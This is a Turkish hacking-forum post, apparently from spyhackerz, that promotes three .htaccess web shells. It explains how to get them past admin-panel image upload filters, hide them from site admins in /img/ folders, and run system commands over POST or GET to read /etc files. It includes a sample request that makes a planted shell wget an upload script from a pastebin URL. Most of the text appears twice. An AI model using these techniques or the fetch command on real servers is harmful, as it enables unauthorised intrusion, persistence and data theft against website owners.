arşivimi yavaş yavaş dökmeye başlamiştim baktim rütbe aldik gaza geldik privler'e dogru gidicez belki dururum bi yerde bilmiyorum arkaplanda'da spyhackerz fon muzigi olunca tutamiyorum kendimi neyse
3 ayri .htaccess dosyasi paylaşicam.
bilirsiniz bazi sitelerin admin panelinde resim ekleme yerinde '.php ,html ' filtresi oluyor dosya yüklenmiyor falan filan .htaccess shelimizi yükleyebiliriz .htaccess biliyorsunuz her sike yariyor bypass methodu olarak .
2.ci olarak servere shell attiniz ama sunucuda firewall var shell siliniyor diyelim yada admin 'i farketti taratti falan genellikle /img/ bölümünde .htaccess oluyor admin biliyor orda oldugunu farketmez yani bu shell ile gizlenebilirsiniz.
3.cüsü .htacces shell ile (cmd komudu çaliştirabiliyoruz POST Methodu ile çalişiyor. POST engelliyse GET VAR)
bu bildigimiz cmd komudu ile ln-s cat fonksiyonlari açıksa serverde herşey yapabilirsiniz.
4.cüsü Buda GET Methoduyla çalişiyo bunlada etc okuyabilirsiniz wget komudu ile dosya'da çekebilirsiniz. örnek olarak :
.htaccess?cmd= shell adresimininizin sonuna gelicek
örnek dosya çekme işlemi:
shelladresi.com/.htaccess?cmd=wget -O tirrek.php https://pastebin.com/raw/qG6QpiYR (upluad kodu)
dedikten sonra shell yolumuz ;shelladresi.com/tirrek.php oluyor pastebindeki upluad kodunu çekiyor ve dosya upluad edebiliyorsunuz.
ben bunla uraşmam derseniz hazir olarak sadece .htaccess olarak bu kodu atarsiniz servere
direk uraşmadan upluad'da yapabilirsiniz.
trde göremedim bu methodlari tek birini görmüştüm bu 3'ü bir arada kafanizi kullanirsaniz herşey yapabilirrsiniz bunla detayli anlattim yorum yazin degerlendirin .
3 ayri .htaccess dosyasi paylaşicam.
bilirsiniz bazi sitelerin admin panelinde resim ekleme yerinde '.php ,html ' filtresi oluyor dosya yüklenmiyor falan filan .htaccess shelimizi yükleyebiliriz .htaccess biliyorsunuz her sike yariyor bypass methodu olarak .
2.ci olarak servere shell attiniz ama sunucuda firewall var shell siliniyor diyelim yada admin 'i farketti taratti falan genellikle /img/ bölümünde .htaccess oluyor admin biliyor orda oldugunu farketmez yani bu shell ile gizlenebilirsiniz.
3.cüsü .htacces shell ile (cmd komudu çaliştirabiliyoruz POST Methodu ile çalişiyor. POST engelliyse GET VAR)
bu bildigimiz cmd komudu ile ln-s cat fonksiyonlari açıksa serverde herşey yapabilirsiniz.
4.cüsü Buda GET Methoduyla çalişiyo bunlada etc okuyabilirsiniz wget komudu ile dosya'da çekebilirsiniz. örnek olarak :
.htaccess?cmd= shell adresimininizin sonuna gelicek
örnek dosya çekme işlemi:
shelladresi.com/.htaccess?cmd=wget -O tirrek.php https://pastebin.com/raw/qG6QpiYR (upluad kodu)
dedikten sonra shell yolumuz ;shelladresi.com/tirrek.php oluyor pastebindeki upluad kodunu çekiyor ve dosya upluad edebiliyorsunuz.
ben bunla uraşmam derseniz hazir olarak sadece .htaccess olarak bu kodu atarsiniz servere
direk uraşmadan upluad'da yapabilirsiniz.
trde göremedim bu methodlari tek birini görmüştüm bu 3'ü bir arada kafanizi kullanirsaniz herşey yapabilirrsiniz bunla detayli anlattim yorum yazin degerlendirin .
spyhackerz , spyhackerz.org , spyhackz , spy hack , spyhack